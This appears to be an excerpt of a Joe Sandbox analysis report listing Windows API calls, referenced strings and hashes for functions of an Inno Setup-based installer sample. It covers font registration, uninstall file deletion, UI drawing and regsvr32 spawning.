                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CloseDirectoryHandleSystem
                                                                                • String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
                                                                                • API String ID: 2051275411-1862435767
                                                                                • Opcode ID: 55f146e1ef8f4e902545c9b8fd40e77843967da88cee367bff3e11b3e7507cae
                                                                                • Instruction ID: 809e342f07c36c5fe80e3456e65159aecd70c9e1b429d99a18f855550af0e9f5
                                                                                • Opcode Fuzzy Hash: 55f146e1ef8f4e902545c9b8fd40e77843967da88cee367bff3e11b3e7507cae
                                                                                • Instruction Fuzzy Hash: 97411570A043086BDB10EFD5D842B8EF7B9AB49705F51407FA904BB292DF789A0D8B19
                                                                                APIs
                                                                                • OffsetRect.USER32(?,00000001,00000001), ref: 0044D1B9
                                                                                • GetSysColor.USER32(00000014), ref: 0044D1C0
                                                                                • SetTextColor.GDI32(00000000,00000000), ref: 0044D1D8
                                                                                • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D201
                                                                                • OffsetRect.USER32(?,000000FF,000000FF), ref: 0044D20B
                                                                                • GetSysColor.USER32(00000010), ref: 0044D212
                                                                                • SetTextColor.GDI32(00000000,00000000), ref: 0044D22A
                                                                                • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D253
                                                                                • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D27E
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Text$Color$Draw$OffsetRect
                                                                                • String ID:
                                                                                • API String ID: 1005981011-0
                                                                                • Opcode ID: 0dad7e536888b1c395f42d34690ba7b0fa2f949a96348ff67bbd6a991a2663e5
                                                                                • Instruction ID: 3cb6cff9cb4fe1f97db5fca9cf7ecf77bacdc285bba155e9e6a5fbb2dce94e66
                                                                                • Opcode Fuzzy Hash: 0dad7e536888b1c395f42d34690ba7b0fa2f949a96348ff67bbd6a991a2663e5
                                                                                • Instruction Fuzzy Hash: 4921CFB42015007FC710FB6ACD8AE8B7BDCDF19319B01857AB918EB393C678DD408669
                                                                                APIs
                                                                                • GetFocus.USER32 ref: 0041B755
                                                                                • 73E9A570.USER32(?), ref: 0041B761
                                                                                • 73E98830.GDI32(00000000,?,00000000,00000000,0041B82C,?,?), ref: 0041B796
                                                                                • 73E922A0.GDI32(00000000,00000000,?,00000000,00000000,0041B82C,?,?), ref: 0041B7A2
                                                                                • 73EA6310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041B80A,?,00000000,0041B82C,?,?), ref: 0041B7D0
                                                                                • 73E98830.GDI32(00000000,00000000,00000000,0041B811,?,?,00000000,00000000,0041B80A,?,00000000,0041B82C,?,?), ref: 0041B804
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: E98830$A570A6310E922Focus
                                                                                • String ID: k H
                                                                                • API String ID: 184897721-1447039187
                                                                                • Opcode ID: 4650e7e3a4975632b128e642f4d75ab8ab1f3030e92489ac81d42ae66184f42b
                                                                                • Instruction ID: e4fa2330707e2e3496a7563b6e1a8945dd65194040c1b513b55e56702052f46b
                                                                                • Opcode Fuzzy Hash: 4650e7e3a4975632b128e642f4d75ab8ab1f3030e92489ac81d42ae66184f42b
                                                                                • Instruction Fuzzy Hash: 33512D74A00208AFCB11DFA9C855AEEBBF9FF49704F104466F504A7390D7789981CBA9
                                                                                APIs
                                                                                • GetFocus.USER32 ref: 0041BA27
                                                                                • 73E9A570.USER32(?), ref: 0041BA33
                                                                                • 73E98830.GDI32(00000000,?,00000000,00000000,0041BAF9,?,?), ref: 0041BA6D
                                                                                • 73E922A0.GDI32(00000000,00000000,?,00000000,00000000,0041BAF9,?,?), ref: 0041BA79
                                                                                • 73EA6310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BAD7,?,00000000,0041BAF9,?,?), ref: 0041BA9D
                                                                                • 73E98830.GDI32(00000000,00000000,00000000,0041BADE,?,?,00000000,00000000,0041BAD7,?,00000000,0041BAF9,?,?), ref: 0041BAD1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: E98830$A570A6310E922Focus
                                                                                • String ID: k H
                                                                                • API String ID: 184897721-1447039187
                                                                                • Opcode ID: 69b514878c6882b8832b1f329327574619d6a3e89a85ba6a4f0b9ad1becc3db2
                                                                                • Instruction ID: 8a06375b061ea5bfc02952791cdae78cf5b61e443f36c9dad2d84499db0416b2
                                                                                • Opcode Fuzzy Hash: 69b514878c6882b8832b1f329327574619d6a3e89a85ba6a4f0b9ad1becc3db2
                                                                                • Instruction Fuzzy Hash: FE510975A002189FCB11DFA9C891AAEBBF9FF49700F15806AF504EB751D7789D40CBA4
                                                                                APIs
                                                                                  • Part of subcall function 00450918: SetEndOfFile.KERNEL32(?,?,0045C6A6,00000000,0045C831,?,00000000,00000002,00000002), ref: 0045091F
                                                                                  • Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049B628,004980C1,00000000,00498116,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63
                                                                                • GetWindowThreadProcessId.USER32(00000000,?), ref: 00495F55
                                                                                • OpenProcess.KERNEL32(00100000,00000000,?,00000000,?), ref: 00495F69
                                                                                • SendNotifyMessageA.USER32(00000000,0000054D,00000000,00000000), ref: 00495F83
                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 00495F8F
                                                                                • CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 00495F95
                                                                                • Sleep.KERNEL32(000001F4,00000000,0000054D,00000000,00000000,00000000,?), ref: 00495FA8
                                                                                Strings
                                                                                • Deleting Uninstall data files., xrefs: 00495ECB
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: FileProcess$CloseDeleteHandleMessageNotifyObjectOpenSendSingleSleepThreadWaitWindow
                                                                                • String ID: Deleting Uninstall data files.
                                                                                • API String ID: 1570157960-2568741658
                                                                                • Opcode ID: 23da1316c50969bb810f13416529c5ad46a4d90d4c3b6db3608d618ecf590902
                                                                                • Instruction ID: fec72cc46ef3efd5c3c8e8a450f489c3c08d507a48e2b84f6ee45df75d5b7e94
                                                                                • Opcode Fuzzy Hash: 23da1316c50969bb810f13416529c5ad46a4d90d4c3b6db3608d618ecf590902
                                                                                • Instruction Fuzzy Hash: 34219571304610AFEB11EB75ECC2B2637A8EB54338F61053BF504DA1E6D678AC008B1D
                                                                                APIs
                                                                                  • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                                • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,004705A1,?,?,?,?,00000000), ref: 0047050B
                                                                                • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,004705A1), ref: 00470522
                                                                                • AddFontResourceA.GDI32(00000000), ref: 0047053F
                                                                                • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 00470553
                                                                                Strings
                                                                                • Failed to open Fonts registry key., xrefs: 00470529
                                                                                • Failed to set value in Fonts registry key., xrefs: 00470514
                                                                                • AddFontResource, xrefs: 0047055D
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CloseFontMessageNotifyOpenResourceSendValue
                                                                                • String ID: AddFontResource$Failed to open Fonts registry key.$Failed to set value in Fonts registry key.
                                                                                • API String ID: 955540645-649663873
                                                                                • Opcode ID: 2b4b64eddd1924655c58b9871aff7fb9a4f934a6e6bff31d8454543361526e14
                                                                                • Instruction ID: 66ce3b01f7eb708e2302e7809b1ea03697ff66c32de1c99646f3643d23023453
                                                                                • Opcode Fuzzy Hash: 2b4b64eddd1924655c58b9871aff7fb9a4f934a6e6bff31d8454543361526e14
                                                                                • Instruction Fuzzy Hash: 62216570741204BBDB10EA669C42FAE779D9B55708F50843BB904EB3C2D67CDE028A5D
                                                                                APIs
                                                                                  • Part of subcall function 00416420: GetClassInfoA.USER32(00400000,?,?), ref: 0041648F
                                                                                  • Part of subcall function 00416420: UnregisterClassA.USER32(?,00400000), ref: 004164BB
                                                                                  • Part of subcall function 00416420: RegisterClassA.USER32(?), ref: 004164DE
                                                                                • GetVersion.KERNEL32 ref: 004631CC
                                                                                • SendMessageA.USER32(00000000,0000112C,00000004,00000004), ref: 0046320A
                                                                                • SHGetFileInfo.SHELL32(004632A8,00000000,?,00000160,00004011), ref: 00463227
                                                                                • LoadCursorA.USER32(00000000,00007F02), ref: 00463245
                                                                                • SetCursor.USER32(00000000,00000000,00007F02,004632A8,00000000,?,00000160,00004011), ref: 0046324B
                                                                                • SetCursor.USER32(?,0046328B,00007F02,004632A8,00000000,?,00000160,00004011), ref: 0046327E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: ClassCursor$Info$FileLoadMessageRegisterSendUnregisterVersion
                                                                                • String ID: Explorer
                                                                                • API String ID: 2594429197-512347832
                                                                                • Opcode ID: e51ab44d2e52b3d60675834673e9b9904728f2271d1ef9b75da4c79774d1131e
                                                                                • Instruction ID: b0d998c5e58c3251a46d3edbb0a2afbc6be3b3781793d4cbec8386629f90fe5f
                                                                                • Opcode Fuzzy Hash: e51ab44d2e52b3d60675834673e9b9904728f2271d1ef9b75da4c79774d1131e
                                                                                • Instruction Fuzzy Hash: FA21E7307403446AEB10FF795C57F9A7698DB09709F5040BFF605EA1C3EA7C8908866D
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02152BE0,?,?,?,02152BE0,00478450,00000000,0047856E,?,?,-00000010,?), ref: 004782A5
                                                                                • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004782AB
                                                                                • GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02152BE0,?,?,?,02152BE0,00478450,00000000,0047856E,?,?,-00000010,?), ref: 004782BE
                                                                                • CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02152BE0,?,?,?,02152BE0), ref: 004782E8
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,02152BE0,00478450,00000000,0047856E,?,?,-00000010,?), ref: 00478306
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: FileHandle$AddressAttributesCloseCreateModuleProc
                                                                                • String ID: GetFinalPathNameByHandleA$kernel32.dll
                                                                                • API String ID: 2704155762-2318956294
                                                                                • Opcode ID: 626e47d356fab76083b756a204e0250164ee9b03011d355f3d3167744cb8654e
                                                                                • Instruction ID: d6ca79aa4c48c3adffb9da4b01ee7f27494699adf3768a2d59cb90ace03db172
                                                                                • Opcode Fuzzy Hash: 626e47d356fab76083b756a204e0250164ee9b03011d355f3d3167744cb8654e
                                                                                • Instruction Fuzzy Hash: 5701C4707C0B0466E520316E4D8AFEB554C8B54B69F54813F7E0CEA2C2DDAE8D06016E
                                                                                APIs
                                                                                • GetLastError.KERNEL32(00000000,0045A2F2,?,00000000,00000000,00000000,?,00000006,?,00000000,0049722D,?,00000000,004972D0), ref: 0045A236
                                                                                  • Part of subcall function 004543E0: FindClose.KERNEL32(000000FF,004544D6), ref: 004544C5
                                                                                Strings
                                                                                • Failed to delete directory (%d). Will retry later., xrefs: 0045A24F
                                                                                • Failed to strip read-only attribute., xrefs: 0045A204
                                                                                • Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 0045A2AB
                                                                                • Deleting directory: %s, xrefs: 0045A1BF
                                                                                • Failed to delete directory (%d)., xrefs: 0045A2CC
                                                                                • Stripped read-only attribute., xrefs: 0045A1F8
                                                                                • Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 0045A210
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CloseErrorFindLast
                                                                                • String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
                                                                                • API String ID: 754982922-1448842058
                                                                                • Opcode ID: 3a6653ca049153ac913e3aecd6f83d976b01ed6d176f23095ac7eac981277501
                                                                                • Instruction ID: e72d66395cbcced70a1ff0d39e5b36b51bb4b2a363b16cebf3a96f2a9050ba33
                                                                                • Opcode Fuzzy Hash: 3a6653ca049153ac913e3aecd6f83d976b01ed6d176f23095ac7eac981277501
                                                                                • Instruction Fuzzy Hash: 9A41A730A042449ACB00DBA988463AE76A55F4930AF5486BBBC04D7393CB7D8E1D875F
                                                                                APIs
                                                                                • GetCapture.USER32 ref: 00422EB4
                                                                                • GetCapture.USER32 ref: 00422EC3
                                                                                • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00422EC9
                                                                                • ReleaseCapture.USER32 ref: 00422ECE
                                                                                • GetActiveWindow.USER32 ref: 00422EDD
                                                                                • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00422F5C
                                                                                • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00422FC0
                                                                                • GetActiveWindow.USER32 ref: 00422FCF
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CaptureMessageSend$ActiveWindow$Release
                                                                                • String ID:
                                                                                • API String ID: 862346643-0
                                                                                • Opcode ID: f8c2677d6609ac077b52c6186ee7afb2eac2e0eedff02b6813b422cc668acf14
                                                                                • Instruction ID: 0c1e69f79f034fd7694da938dfb4ae80f60ee9794ae3f0b0e2c785ff7ec3c7d8
                                                                                • Opcode Fuzzy Hash: f8c2677d6609ac077b52c6186ee7afb2eac2e0eedff02b6813b422cc668acf14
                                                                                • Instruction Fuzzy Hash: E4413F70B00254AFDB10EB6ADA42B9A77F1EF44304F5540BAF500AB392DB78AE40DB5D
                                                                                APIs
                                                                                • GetWindowLongA.USER32(?,000000F0), ref: 0042F2CA
                                                                                • GetWindowLongA.USER32(?,000000EC), ref: 0042F2E1
                                                                                • GetActiveWindow.USER32 ref: 0042F2EA
                                                                                • MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 0042F317
                                                                                • SetActiveWindow.USER32(?,0042F447,00000000,?), ref: 0042F338
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ActiveLong$Message
                                                                                • String ID:
                                                                                • API String ID: 2785966331-0
                                                                                • Opcode ID: 511403c039d27e5fd3d4a37a0efbe646b1f0bba5a7b321b537e6f3b04ffedf77
                                                                                • Instruction ID: 0493a3c03df3966e51b4b777c60d25e7c68e0b9e8cdf2dbcd65ae894a3a71964
                                                                                • Opcode Fuzzy Hash: 511403c039d27e5fd3d4a37a0efbe646b1f0bba5a7b321b537e6f3b04ffedf77
                                                                                • Instruction Fuzzy Hash: 7631B471A00654AFDB01EFB5DC52E6EBBB8EB09714B91447AF804E3691D738AD10CB58
                                                                                APIs
                                                                                • 73E9A570.USER32(00000000), ref: 0042949A
                                                                                • GetTextMetricsA.GDI32(00000000), ref: 004294A3
                                                                                  • Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 004294B2
                                                                                • GetTextMetricsA.GDI32(00000000,?), ref: 004294BF
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 004294C6
                                                                                • 73E9A480.USER32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 004294CE
                                                                                • GetSystemMetrics.USER32(00000006), ref: 004294F3
                                                                                • GetSystemMetrics.USER32(00000006), ref: 0042950D
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Metrics$ObjectSelectSystemText$A480A570CreateFontIndirect
                                                                                • String ID:
                                                                                • API String ID: 361401722-0
                                                                                • Opcode ID: ed5406780fbe6b6ddf9677d4a66f370c2a77f814a30f66ac1398573dbf155f17
                                                                                • Instruction ID: f9189b99ec718bdc55f682ba078bc6b9c4dab98ca430e676b6dc028aca6f8884
                                                                                • Opcode Fuzzy Hash: ed5406780fbe6b6ddf9677d4a66f370c2a77f814a30f66ac1398573dbf155f17
                                                                                • Instruction Fuzzy Hash: 3301E1917087513BFB11B67A9CC2F6B61C8CB8435CF44043FFA459A3D2D96C9C80866A
                                                                                APIs
                                                                                • 73E9A570.USER32(00000000,?,00419069,004985AE), ref: 0041DE37
                                                                                • 73EA4620.GDI32(00000000,0000005A,00000000,?,00419069,004985AE), ref: 0041DE41
                                                                                • 73E9A480.USER32(00000000,00000000,00000000,0000005A,00000000,?,00419069,004985AE), ref: 0041DE4E
                                                                                • MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0041DE5D
                                                                                • GetStockObject.GDI32(00000007), ref: 0041DE6B
                                                                                • GetStockObject.GDI32(00000005), ref: 0041DE77
                                                                                • GetStockObject.GDI32(0000000D), ref: 0041DE83
                                                                                • LoadIconA.USER32(00000000,00007F00), ref: 0041DE94
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: ObjectStock$A4620A480A570IconLoad
                                                                                • String ID:
                                                                                • API String ID: 2905290459-0
                                                                                • Opcode ID: c7b946ff5d18463f692f08f3109d9fac972284bfbf41894a6d0fe66ccf938658
                                                                                • Instruction ID: 4e0a0a69a1fbcc37fa68332f5170e2556ef2fd96a8c36c1a21edcb526b0e3b4b
                                                                                • Opcode Fuzzy Hash: c7b946ff5d18463f692f08f3109d9fac972284bfbf41894a6d0fe66ccf938658
                                                                                • Instruction Fuzzy Hash: E11100B06457015AE740FF666A92BA63694D724708F00813FF605AF3D2D7792C449B9E
                                                                                APIs
                                                                                • LoadCursorA.USER32(00000000,00007F02), ref: 004636B0
                                                                                • SetCursor.USER32(00000000,00000000,00007F02,00000000,00463745), ref: 004636B6
                                                                                • SetCursor.USER32(?,0046372D,00007F02,00000000,00463745), ref: 00463720
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Cursor$Load
                                                                                • String ID: $ $Internal error: Item already expanding
                                                                                • API String ID: 1675784387-1948079669
                                                                                • Opcode ID: 11d96d50149c7a0783bfaa5a1745a1d7ac95eac117891e2e72ad5ff3e9801c67
                                                                                • Instruction ID: 5f7148262a90782ca5f39c73a98182432cf514ee5891adbc4e31059349ad3c9c
                                                                                • Opcode Fuzzy Hash: 11d96d50149c7a0783bfaa5a1745a1d7ac95eac117891e2e72ad5ff3e9801c67
